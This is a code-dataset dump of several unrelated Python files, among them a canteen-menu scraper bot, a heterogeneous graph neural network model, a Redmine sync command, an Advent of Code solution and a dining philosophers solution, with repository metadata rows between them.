commands = []
for lang in self.columns:
for item in self.data[lang]['sub_commands'].values():
commands.append(item)
else:
commands = [self.data[lang]['commands'][key] for lang in self.columns]
for item in commands:
if item not in reply:
reply.append(item)
return reply
def inverse_command_map(self, key, lang=None):
if lang == None: lang = self.default
my_map = self.data[lang]['sub_commands']
inv_map = {v: k for k, v in my_map.items()}
return inv_map[key]
def reply_position(self, usrCoord, lang=None):
if lang is None: lang = self.default
markup = []; nearDist = []; unit = ['km' for _ in range(3)]
distDict = {'mensa': {}, 'aulastudio': {}, 'biblioteca': {}}
tmp = distDict
today = str(datetime.today().weekday())
for item in [s.replace('/','') for t in self.get_keyboard('mensa', lang) for s in t]:
if item != 'home':
pranzo = self.data['sub_commands'][item]['pranzo']['aperta']
cena = self.data['sub_commands'][item]['cena']['aperta']
if cena or pranzo:
distDict['mensa'][item] = {"lat": self.data['keyboard'][item]['lat'], "lon": self.data['keyboard'][item]['lon']}
for item in [s.replace('/','') for t in self.get_keyboard('biblioteca', lang) for s in t]:
if item != 'home':
                # TODO: check that the library is open
distDict['biblioteca'][item] = {"lat": self.data['keyboard'][item]['lat'], "lon": self.data['keyboard'][item]['lon']}
        for item in [s.replace('/','') for t in self.get_keyboard('aulastudio', lang) for s in t]:
            if item not in ('home', 'reset'):
                distDict['aulastudio'][item] = {"lat": self.data['keyboard'][item]['lat'], "lon": self.data['keyboard'][item]['lon']}
for key in distDict:
for i in distDict[key]:
lat = distDict[key][i]['lat']
lon = distDict[key][i]['lon']
tmp[key][i] = vincenty((usrCoord['latitude'],
usrCoord['longitude']),
(lat, lon)).kilometers
nearMensa = min(tmp['mensa'], key=tmp['mensa'].get)
nearAula = min(tmp['aulastudio'], key=tmp['aulastudio'].get)
nearBiblio = min(tmp['biblioteca'], key=tmp['biblioteca'].get)
nearDist.append(float(tmp['mensa'][nearMensa]))
nearDist.append(float(tmp['aulastudio'][nearAula]))
nearDist.append(float(tmp['biblioteca'][nearBiblio]))
for i in range(len(nearDist)):
if nearDist[i] < 1:
nearDist[i] = nearDist[i]*1000
unit[i] = 'm'
str_lang = self.data[lang]['position']['reply']
line1 = "- `" + str_lang[0] + "` " + str_lang[1] + ": *{}*, " + str_lang[2] + " _{:.0f}_ " + unit[0] + ".\n\n"
line1 = line1.format(self.data['sub_commands'][nearMensa]['nome'], nearDist[0])
line2 = "- `" + str_lang[3] + "` " + str_lang[1] + ": *{}*, " + str_lang[2] + " _{:.0f}_ " + unit[1] + ".\n\n"
line2 = line2.format(self.data['sub_commands'][nearAula]['title'], nearDist[1])
line3 = "- `" + str_lang[4] + "` " + str_lang[1] + ": *{}*, " + str_lang[2] + " _{:.0f}_ " + unit[2] + ".\n\n"
line3 = line3.format(self.data['sub_commands'][nearBiblio]['title'], nearDist[2])
reply = line1 + line2 + line3
markup.append(['/'+nearMensa])
markup.append(['/'+nearAula])
markup.append(['/'+nearBiblio])
markup.append(['/home'])
return reply, markup
def update_mense(self):
# Update Mense
html = requests.get('http://www.esupd.gov.it/it')
#print(html.headers['Date'])
html = BeautifulSoup(html.content, "html.parser")
rows = html.find('table',attrs={"summary":"Di seguito sono illustrate le mense con i loro tempi di attesa e i link ai menu, ove disponibili"}).find_all("tr")
#for tmp in rows:
#print(tmp.text)
mense = dict()
for row in rows:
name = row.find('th').text.lower().replace(' ','')
if name == 'piox': name = 'acli'
elif name == 'nordpiovego': name = 'piovego'
if name != '':
mense[name] = {"type": 2, "pranzo": {}, "cena": {}}
for i, cell in enumerate(row.find_all('td')):
                    if i == 0:  # pranzo (lunch)
mense[name]['pranzo'] = {"aperta": cell.span['class'][0] == 'open', \
"primo": "", "secondo": "", "contorno": "", "dessert": ""}
                    elif i == 1:  # cena (dinner)
mense[name]['cena'] = {"aperta": cell.span['class'][0] == 'open', \
"primo": "", "secondo": "", "contorno": "", "dessert": ""}
                    elif i == 3:  # menu link
a = cell.find('a')
#print(name, a)
if a is not None:
html = requests.get('http://www.esupd.gov.it' + a['href'])
html = BeautifulSoup(html.content, "html.parser")
menu = html.find('div', attrs={'id': 'WebPartWPQ5'})
for i, portata in enumerate(menu.find_all('ul')):
text = [_.text.replace(':','').replace('*','').replace(',\r','').replace('\t','').replace('\n','').replace('\r\r',', ').replace('\r','') for _ in portata.find_all('li')]
                                if i == 0:  # primo (first course)
                                    mense[name]['pranzo']['primo'] = ', '.join(text)
                                elif i == 1:  # secondo (main course)
                                    mense[name]['pranzo']['secondo'] = ', '.join(text)
                                elif i == 2:  # contorno (side dish)
                                    mense[name]['pranzo']['contorno'] = ', '.join(text)
                                elif i == 3:  # dolce (dessert)
                                    mense[name]['pranzo']['dessert'] = ', '.join(text)
                            # Menu found -> add this canteen to daily_mensa
if name not in self.daily_mensa['completed'] and \
name not in self.daily_mensa['new']:
self.daily_mensa['new'].append(name)
orari = [['piovego', 'Nord Piovego', 'viale Colombo 1', '11:30', '14:30'],
['agripolis', 'Agripolis', 'viale Università 16, Legnaro', '11:45', '14:30'],
['belzoni', 'Belzoni', 'Via Belzoni, 146', '11:45', '14:30'],
['murialdo', 'Murialdo', 'Via Grassi 42', '11:45', '14:30', '19:15', '20:45'],
['forcellini', 'Forcellini', 'Via Forcellini, 172', '11:45', '14:30'],
['acli', 'Acli - Pio X', 'Via Bonporti 20', '11:30', '14:30', '18:45', '21:00'],
['sanfrancesco', 'San Francesco', 'Via S. Francesco, 122', '', '']]
for row in orari:
mense[row[0]]['nome'] = row[1]
mense[row[0]]['indirizzo'] = row[2]
mense[row[0]]['pranzo']['apertura'] = row[3]
mense[row[0]]['pranzo']['chiusura'] = row[4]
try:
mense[row[0]]['cena']['apertura'] = row[5]
mense[row[0]]['cena']['chiusura'] = row[6]
except:
pass
with open(self.path + 'mense.json', 'w') as outfile:
json.dump(mense, outfile, indent=4)
self.update_json()
class RepeatedTimer(object):
def __init__(self, interval, function):
self._timer = None
self.interval = interval
self.function = function
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function()
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
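# A minimal usage sketch for RepeatedTimer (hypothetical callback; the timer
# re-arms itself after every interval until stop() is called):
# timer = RepeatedTimer(60 * 15, refresh_menus)  # fire every 15 minutes
# ...
# timer.stop()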
if __name__ == '__main__':
from config import supported_languages, captions_path
# Used as update script by cron
a = Captions(supported_languages, captions_path, quick=False)
#print(a.reply_position({'longitude': 11.891931, 'latitude': 45.407387}))
#print(a.get_command_handlers('orario'))
#print(a.get_command_handlers('sub_commands'))
a.update_mense()
#print(a.daily_mensa)
#print(a.get_reply('acli'))
a.stop()
| 43.929319 | 201 | 0.491389 | 1,776 | 16,781 | 4.561937 | 0.208896 | 0.032585 | 0.016292 | 0.023451 | 0.246853 | 0.180079 | 0.150457 | 0.125648 | 0.084053 | 0.067514 | 0 | 0.020124 | 0.33669 | 16,781 | 381 | 202 | 44.044619 | 0.707753 | 0.050891 | 0 | 0.193103 | 0 | 0.003448 | 0.183209 | 0 | 0 | 0 | 0 | 0.002625 | 0 | 1 | 0.044828 | false | 0.010345 | 0.024138 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e5ea98841b742b1b5604825ff3dfb2155b8ad2 | 6,211 | py | Python | openhgnn/models/HPN.py | BUPTlfq/OpenHGNN | 77041e68c33a8a42a2c187c6e42d85b81cbb25d3 | [
"Apache-2.0"
] | null | null | null | openhgnn/models/HPN.py | BUPTlfq/OpenHGNN | 77041e68c33a8a42a2c187c6e42d85b81cbb25d3 | [
"Apache-2.0"
] | null | null | null | openhgnn/models/HPN.py | BUPTlfq/OpenHGNN | 77041e68c33a8a42a2c187c6e42d85b81cbb25d3 | [
"Apache-2.0"
] | null | null | null | """
This model shows an example of using dgl.metapath_reachable_graph on the original heterogeneous
graph.
"""
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import dgl
from scipy import sparse as sp
from . import BaseModel, register_model
from dgl.nn.pytorch.conv import APPNPConv
@register_model('HPN')
class HPN(BaseModel):
r"""
Description
------------
This model shows an example of using dgl.metapath_reachable_graph on the original heterogeneous
    graph. HPN comes from the paper 'Heterogeneous Graph Propagation Network
    <https://ieeexplore.ieee.org/abstract/document/9428609>'.
    The authors did not provide code, so we implement it following the
    implementation of HAN.
.. math::
        \mathbf{Z}^{\Phi}=\mathcal{P}_{\Phi}(\mathbf{X})=g_{\Phi}(f_{\Phi}(\mathbf{X}))

        \mathbf{H}^{\Phi}=f_{\Phi}(\mathbf{X})=\sigma(\mathbf{X} \cdot \mathbf{W}^{\Phi}+\mathbf{b}^{\Phi})

        \mathbf{Z}^{\Phi, k}=g_{\Phi}\left(\mathbf{Z}^{\Phi, k-1}\right)=(1-\gamma) \cdot \mathbf{M}^{\Phi} \cdot \mathbf{Z}^{\Phi, k-1}+\gamma \cdot \mathbf{H}^{\Phi}

        w_{\Phi_{p}}=\frac{1}{|\mathcal{V}|} \sum_{i \in \mathcal{V}} \mathbf{q}^{\mathrm{T}} \cdot \tanh \left(\mathbf{W} \cdot \mathbf{z}_{i}^{\Phi_{p}}+\mathbf{b}\right)

        \mathbf{Z}=\sum_{p=1}^{P} \beta_{\Phi_{p}} \cdot \mathbf{Z}^{\Phi_{p}}
Parameters
------------
meta_paths : list
contain multiple meta-paths.
category : str
The category means the head and tail node of metapaths.
in_size : int
input feature dimension.
out_size : int
out dimension.
dropout : float
Dropout probability.
out_embedsizes : int
Dimension of the final embedding Z
k_layer : int
        propagation times :math:`K`.
    alpha : float
        Value of restart probability :math:`\alpha`.
edge_drop : float, optional
The dropout rate on edges that controls the
messages received by each node. Default: ``0``.
"""
@classmethod
def build_model_from_args(cls, args, hg):
etypes = hg.canonical_etypes
mps = []
for etype in etypes:
if etype[0] == args.category:
for dst_e in etypes:
if etype[0] == dst_e[2] and etype[2] == dst_e[0]:
mps.append([etype, dst_e])
return cls(meta_paths=mps, category=args.category,
in_size=args.hidden_dim,
out_size=args.out_dim,
dropout=args.dropout,
out_embedsize=args.out_embedsize,
k_layer=args.k_layer,
alpha=args.alpha,
edge_drop=args.edge_drop
)
def __init__(self, meta_paths, category, in_size, out_size, dropout, out_embedsize, k_layer, alpha, edge_drop):
super(HPN, self).__init__()
self.category = category
self.layers = nn.ModuleList()
self.layers.append(HPNLayer(meta_paths, in_size, dropout, k_layer, alpha, edge_drop, out_embedsize))
self.linear = nn.Linear(out_embedsize, out_size)
def forward(self, g, h_dict):
h = h_dict[self.category]
for gnn in self.layers:
h = gnn(g, h)
return {self.category: self.linear(h)}
class SemanticFusion(nn.Module):
def __init__(self, in_size=64, hidden_size=128):
super(SemanticFusion, self).__init__()
self.project = nn.Sequential(
nn.Linear(in_size, hidden_size),
nn.Tanh(),
nn.Linear(hidden_size, 1, bias=False)
)
def forward(self, z):
w = self.project(z).mean(0)
beta = torch.softmax(w, dim=0)
beta = beta.expand((z.shape[0],) + beta.shape)
return (beta * z).sum(1)
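# Shape note for SemanticFusion.forward (an illustrative aside): for z of shape
# (N, P, D), with N nodes, P meta-paths and D features, self.project(z) gives
# (N, P, 1); .mean(0) averages over nodes to w of shape (P, 1); softmax turns w
# into per-meta-path weights beta; the weighted sum returns shape (N, D).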
class HPNLayer(nn.Module):
"""
HPN layer.
Arguments
---------
meta_paths : list of metapaths, each as a list of edge types
in_size : input feature dimension
dropout : Dropout probability
k_layer : propagation times
alpha : Value of restart probability
edge_drop : the dropout rate on edges that controls the messages received by each node
out_embedsize : Dimension of the final embedding Z
Inputs
------
g : DGLHeteroGraph
The heterogeneous graph
h : tensor
Input features
Outputs
-------
tensor
The output feature
"""
def __init__(self, meta_paths, in_size, dropout,k_layer, alpha, edge_drop, out_embedsize):
super(HPNLayer, self).__init__()
        # semantic projection function fΦ projects nodes into the semantic space
self.hidden = nn.Sequential(
#nn.Linear(in_features=in_size, out_features=out_embedsize, bias=True),
nn.ReLU()
)
# One Propagation layer for each meta path
self.propagation_layers = nn.ModuleList()
for i in range(len(meta_paths)):
self.propagation_layers.append(APPNPConv(k_layer, alpha, edge_drop))
self.semantic_fusion = SemanticFusion()
self.meta_paths = list(tuple(meta_path) for meta_path in meta_paths)
self._cached_graph = None
self._cached_coalesced_graph = {}
def forward(self, g, h):
r"""
Parameters
-----------
g : DGLHeteroGraph
The heterogeneous graph
h : tensor
The input features
Returns
--------
h : tensor
The output features
"""
semantic_embeddings = []
h = self.hidden(h)
if self._cached_graph is None or self._cached_graph is not g:
self._cached_graph = g
self._cached_coalesced_graph.clear()
for meta_path in self.meta_paths:
self._cached_coalesced_graph[meta_path] = dgl.metapath_reachable_graph(
g, meta_path)
for i, meta_path in enumerate(self.meta_paths):
new_g = self._cached_coalesced_graph[meta_path]
semantic_embeddings.append(self.propagation_layers[i](new_g, h).flatten(1))
semantic_embeddings = torch.stack(semantic_embeddings, dim=1)
return self.semantic_fusion(semantic_embeddings)
| 32.689474 | 172 | 0.609886 | 807 | 6,211 | 4.508055 | 0.262701 | 0.029687 | 0.02144 | 0.016493 | 0.236669 | 0.167675 | 0.13414 | 0.1105 | 0.1105 | 0.1105 | 0 | 0.006693 | 0.278377 | 6,211 | 189 | 173 | 32.862434 | 0.804775 | 0.386733 | 0 | 0 | 0 | 0 | 0.000865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08642 | false | 0 | 0.098765 | 0 | 0.271605 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5e726c942c514e6fc040b888b81d139effa2457 | 1,455 | py | Python | rllib/environment/systems/gaussian_system.py | shenao-zhang/DCPU | 0da9aa2b7878b54ba4ee4dca894c2e86cdc0d559 | [
"MIT"
] | 8 | 2020-10-23T07:52:19.000Z | 2022-03-06T13:35:12.000Z | rllib/environment/systems/gaussian_system.py | shenao-zhang/DCPU | 0da9aa2b7878b54ba4ee4dca894c2e86cdc0d559 | [
"MIT"
] | 3 | 2021-03-04T13:44:01.000Z | 2021-03-23T09:57:50.000Z | rllib/environment/systems/gaussian_system.py | shenao-zhang/DCPU | 0da9aa2b7878b54ba4ee4dca894c2e86cdc0d559 | [
"MIT"
] | 3 | 2021-03-18T08:23:56.000Z | 2021-07-06T11:20:12.000Z | """Implementation of a System with Gaussian transition and measurement noise."""
import numpy as np
from .abstract_system import AbstractSystem
class GaussianNoiseSystem(AbstractSystem):
"""Modify a system with gaussian transition and measurement noise.
Parameters
----------
system: AbstractSystem
transition_noise_scale: float
measurement_noise_scale: float, optional
"""
def __init__(self, system, transition_noise_scale, measurement_noise_scale=0):
super().__init__(
dim_state=system.dim_state,
dim_action=system.dim_action,
dim_observation=system.dim_observation,
)
self._system = system
self._transition_noise_scale = transition_noise_scale
self._measurement_noise_scale = measurement_noise_scale
def step(self, action):
"""See `AbstractSystem.step'."""
next_state = self._system.step(action)
next_state += self._transition_noise_scale * np.random.randn(self.dim_state)
return next_state
def reset(self, state):
"""See `AbstractSystem.reset'."""
return self._system.reset(state)
@property
def state(self):
"""See `AbstractSystem.state'."""
state = self._system.state
state += self._measurement_noise_scale * np.random.randn(self.dim_state)
return state
@state.setter
def state(self, value):
self._system.state = value
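# A minimal usage sketch (hypothetical `Pendulum` subclass of AbstractSystem):
# noisy = GaussianNoiseSystem(Pendulum(), transition_noise_scale=0.01,
#                             measurement_noise_scale=0.001)
# next_state = noisy.step(action)  # Gaussian dynamics noise added each step
# observed = noisy.state           # measurement noise added on every read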
| 29.693878 | 84 | 0.674914 | 162 | 1,455 | 5.759259 | 0.265432 | 0.107181 | 0.107181 | 0.040729 | 0.257235 | 0.190782 | 0.190782 | 0.190782 | 0.087889 | 0 | 0 | 0.000891 | 0.228866 | 1,455 | 48 | 85 | 30.3125 | 0.83066 | 0.232302 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.076923 | 0 | 0.423077 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ec84ef8dd62cb492046d2371c97d2fa37e8b51 | 1,013 | py | Python | apps/tasker/management/commands/sync_all.py | hugoseabra/redmine-task-generator | b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf | [
"MIT"
] | null | null | null | apps/tasker/management/commands/sync_all.py | hugoseabra/redmine-task-generator | b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf | [
"MIT"
] | 4 | 2021-03-30T14:04:56.000Z | 2021-06-10T19:40:52.000Z | apps/tasker/management/commands/sync_all.py | hugoseabra/redmine-task-generator | b5ce1764f1c7588a7c82b25f7dd4bf07d1c105cf | [
"MIT"
] | null | null | null | from django.core.management import call_command
from django.core.management.base import BaseCommand
from core.cli.mixins import CliInteractionMixin
from redmine import Redmine
class Command(BaseCommand, CliInteractionMixin):
help = "Syncronizes all data to Redmine instance."
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.redmine = Redmine()
def handle(self, *args, **options):
print()
self.stdout.write('VALIDATING REDMINE INSTANCE')
print()
if self.redmine.instance_valid() is False:
self.stderr.write(self.style.ERROR('Errors:'))
for e in self.redmine.instance_errors():
self.stderr.write(self.style.ERROR(f'- {e}'))
self.exit()
call_command('sync_trackers')
call_command('sync_score_field')
call_command('sync_projects')
call_command('sync_categories')
call_command('sync_versions')
call_command('sync_issues')
| 30.69697 | 61 | 0.65844 | 116 | 1,013 | 5.543103 | 0.456897 | 0.119751 | 0.139969 | 0.07465 | 0.090202 | 0.090202 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228036 | 1,013 | 32 | 62 | 31.65625 | 0.822251 | 0 | 0 | 0.083333 | 0 | 0 | 0.158934 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.333333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5ee4c60b25530e2b119645f9ed429a666be7ec0 | 1,550 | py | Python | 2021/17/solve.py | lamperi/aoc | 1781dcbac0be18a086c10a9b76fb6a2d3595523c | [
"MIT"
] | null | null | null | 2021/17/solve.py | lamperi/aoc | 1781dcbac0be18a086c10a9b76fb6a2d3595523c | [
"MIT"
] | null | null | null | 2021/17/solve.py | lamperi/aoc | 1781dcbac0be18a086c10a9b76fb6a2d3595523c | [
"MIT"
] | null | null | null | import os.path
INPUT=os.path.join(os.path.dirname(__file__), "input.txt")
with open(INPUT) as f:
data = f.read()
test="""target area: x=20..30, y=-10..-5"""
def part12(data):
l = data.split()
x=l[2]
y=l[3]
min_x, max_x = list(map(int, x.split("=")[1].split(",")[0].split("..")))
min_y, max_y = list(map(int, y.split("=")[1].split("..")))
highest_y=0
matches=set()
    # vy is bounded because:
    # - anything below min_y overshoots the target area on the first step
    # - anything at or above -min_y overshoots on the first step after the
    #   probe falls back past y=0
    # vx is bounded because anything above max_x overshoots on the first step
for vy in range(min_y,-min_y):
for vx in range(max_x+1):
s=(0,0)
v=(vy,vx)
ymax=0
hit=False
for t in range(500000):
s = (s[0]+v[0], s[1]+v[1])
ymax = max((ymax, s[0]))
v=(v[0]-1, max(0, v[1]-1))
if min_x <= s[1] <= max_x and min_y <= s[0] <= max_y:
hit=True
break
elif s[0] < min_y or s[1] > max_x:
break
if hit:
matches.add((vy,vx))
highest_y = max((highest_y, ymax))
return f"{highest_y} {len(matches)}"
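# Aside (a hedged shortcut): for part 1 alone, the peak height of a launch with
# upward velocity vy is the triangular number vy*(vy+1)/2; the largest legal vy
# is -min_y - 1, which gives min_y*(min_y+1)/2 without any simulation. The
# brute force above is kept because part 2 needs every hitting (vy, vx) pair.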
print(part12(test))
print(part12(data))
| 29.807692 | 92 | 0.540645 | 247 | 1,550 | 3.307692 | 0.388664 | 0.02448 | 0.044064 | 0.058752 | 0.135863 | 0.135863 | 0.135863 | 0.135863 | 0.135863 | 0.095471 | 0 | 0.040528 | 0.315484 | 1,550 | 51 | 93 | 30.392157 | 0.7295 | 0.149677 | 0 | 0.05 | 0 | 0 | 0.056445 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | false | 0 | 0.175 | 0 | 0.225 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f161e953bf4e647b2dba3274549ebc84e9aa60 | 1,665 | py | Python | setup.py | bintoro/schematics | 6eb68dbecd09fa695a867a493d692d1befc039f2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | bintoro/schematics | 6eb68dbecd09fa695a867a493d692d1befc039f2 | [
"BSD-3-Clause"
] | null | null | null | setup.py | bintoro/schematics | 6eb68dbecd09fa695a867a493d692d1befc039f2 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
from schematics import __version__
class Tox(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = ['--recreate']
self.test_suite = True
def run_tests(self):
        # import here, because outside the eggs aren't loaded
import tox
errno = tox.cmdline(self.test_args)
sys.exit(errno)
tests_require = open(
os.path.join(os.path.dirname(__file__), 'requirements.txt')).read().split()
setup(
name='schematics',
license='BSD',
version=__version__,
description='Structured Data for Humans',
author=u'James Dennis, Jökull Sólberg, Jóhann Þorvaldur Bergþórsson',
author_email='jdennis@gmail.com, jokull@plainvanillagames.com, johann@plainvanillagames.com',
url='http://github.com/schematics/schematics',
packages=['schematics', 'schematics.types', 'schematics.contrib'],
classifiers=[
'Environment :: Other Environment',
'Intended Audience :: Developers',
'License :: Other/Proprietary License',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
],
cmdclass={
'test': Tox,
},
install_requires=[
'six>=1.7.3',
],
tests_require=tests_require,
)
| 29.210526 | 97 | 0.645045 | 182 | 1,665 | 5.774725 | 0.571429 | 0.108468 | 0.142721 | 0.074215 | 0.05138 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010062 | 0.224024 | 1,665 | 56 | 98 | 29.732143 | 0.803406 | 0.055255 | 0 | 0.044444 | 0 | 0 | 0.403822 | 0.036306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0 | 0.133333 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f208e8fafb3683bef084c028636aeac944b3df | 4,562 | py | Python | flashfocus/flasher.py | Airblader/flashfocus | 1a04e5c68a0a9ee44e0fa6454b6addeb4ba3cb68 | [
"MIT"
] | 4 | 2018-06-26T17:48:49.000Z | 2020-06-11T11:39:15.000Z | flashfocus/flasher.py | Airblader/flashfocus | 1a04e5c68a0a9ee44e0fa6454b6addeb4ba3cb68 | [
"MIT"
] | null | null | null | flashfocus/flasher.py | Airblader/flashfocus | 1a04e5c68a0a9ee44e0fa6454b6addeb4ba3cb68 | [
"MIT"
] | 1 | 2019-03-07T03:50:07.000Z | 2019-03-07T03:50:07.000Z | """Monitor focus and flash windows."""
from __future__ import division
from threading import Thread
import os
import logging
from logging import info as log
from time import sleep
from xcffib.xproto import WindowError
import flashfocus.xutil as xutil
class Flasher:
"""Main flashfocus class.
Waits for focused window to change then flashes it.
Parameters
----------
flash_opacity: float
Flash opacity as a decimal between 0 and 1
time: float
Flash interval in seconds
ntimepoints: int
Number of timepoints in the flash animation. Higher values will lead to
smoother animations at the cost of increased X server requests.
Ignored if simple is True.
simple: bool
If True, don't animate flashes. Setting this parameter improves
performance but causes rougher opacity transitions.
"""
def __init__(self, flash_opacity, time, ntimepoints, simple):
self.flash_opacity = flash_opacity
self.time = time
self.simple = simple
if simple:
self.ntimepoints = 1
self.timechunk = time
else:
self.ntimepoints = ntimepoints
self.timechunk = time / self.ntimepoints
self.flash_series_hash = {}
self.locked_windows = set()
def compute_flash_series(self, current_opacity):
"""Calculate the series of opacity values for the flash animation.
Given the opacity of a window before a flash, and the flash opacity,
this method calculates a smooth series of intermediate opacity values.
Results of the calculation are hashed to speed up later flashes.
"""
if not current_opacity:
current_opacity = 1
try:
return self.flash_series_hash[current_opacity]
except KeyError:
log('Computing flash series for opacity = %s', current_opacity)
opacity_diff = current_opacity - self.flash_opacity
flash_series = [self.flash_opacity +
((x / self.ntimepoints) * opacity_diff)
for x in range(self.ntimepoints)]
log('Computed flash series = %s', flash_series)
self.flash_series_hash[current_opacity] = flash_series
return flash_series
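    # Worked example (an illustrative aside): with flash_opacity=0.8,
    # ntimepoints=4 and a pre-flash opacity of 1.0, opacity_diff is 0.2 and
    # the computed series is [0.8, 0.85, 0.9, 0.95]: the window first drops to
    # the flash opacity, then ramps smoothly back toward its original value.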
def flash_window(self, window):
"""Briefly change the opacity of a Xorg window."""
log('Flashing window %s', str(window))
try:
pre_flash_opacity = xutil.request_opacity(window).unpack()
log('Current opacity = %s', str(pre_flash_opacity))
log('Beginning flash animation...')
flash_series = self.compute_flash_series(pre_flash_opacity)
for opacity in flash_series:
xutil.set_opacity(window, opacity)
sleep(self.timechunk)
log('Resetting opacity to default')
if pre_flash_opacity:
xutil.set_opacity(window, pre_flash_opacity)
else:
xutil.delete_opacity(window)
except WindowError:
log('Attempted to flash a nonexistent window %s, ignoring...',
str(window))
log('Unlocking window %s', window)
self.locked_windows.discard(window)
def monitor_focus(self):
"""Wait for changes in focus and flash windows."""
xutil.start_watching_properties(xutil.ROOT_WINDOW)
# We keep track of the previously focused window so that the same window
# is never flashed twice in a row. On i3 when a window is closed, the
# next window is flashed three times without this guard.
prev_focus = None
focused = None
while True:
xutil.wait_for_focus_shift()
prev_focus = focused
focused = xutil.request_focus().unpack()
log('Focus shifted to window %s', focused)
if focused not in self.locked_windows and focused != prev_focus:
# Further flash requests are ignored for the window until the
# thread completes.
log('Locking window %s', focused)
self.locked_windows.add(focused)
p = Thread(target=self.flash_window, args=[focused])
p.daemon = True
p.start()
elif focused == prev_focus:
log("Window %s was just flashed, ignoring...", focused)
elif focused in self.locked_windows:
log("Window %s is locked, ignoring...", focused)
| 36.790323 | 80 | 0.619904 | 539 | 4,562 | 5.113173 | 0.328386 | 0.056604 | 0.030842 | 0.020682 | 0.023948 | 0.023948 | 0 | 0 | 0 | 0 | 0 | 0.00159 | 0.310609 | 4,562 | 123 | 81 | 37.089431 | 0.874722 | 0.2637 | 0 | 0.054054 | 0 | 0 | 0.107297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.054054 | false | 0 | 0.108108 | 0 | 0.202703 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5f5eb2e3a25f04de70d6baa6fe5677c9db2ce33 | 1,055 | py | Python | 1201-1300/1226-The Dining Philosophers/1226-The Dining Philosophers.py | jiadaizhao/LeetCode | 4ddea0a532fe7c5d053ffbd6870174ec99fc2d60 | [
"MIT"
] | 49 | 2018-05-05T02:53:10.000Z | 2022-03-30T12:08:09.000Z | 1201-1300/1226-The Dining Philosophers/1226-The Dining Philosophers.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 11 | 2017-12-15T22:31:44.000Z | 2020-10-02T12:42:49.000Z | 1201-1300/1226-The Dining Philosophers/1226-The Dining Philosophers.py | jolly-fellow/LeetCode | ab20b3ec137ed05fad1edda1c30db04ab355486f | [
"MIT"
] | 28 | 2017-12-05T10:56:51.000Z | 2022-01-26T18:18:27.000Z | from threading import Semaphore, Lock
class DiningPhilosophers:
def __init__(self):
self.sem = Semaphore(4)
self.locks = [Lock() for _ in range(5)]
def pickFork(self, id, fun):
self.locks[id].acquire()
fun()
def putFork(self, id, fun):
fun()
self.locks[id].release()
# call the functions directly to execute, for example, eat()
def wantsToEat(self,
philosopher: int,
pickLeftFork: 'Callable[[], None]',
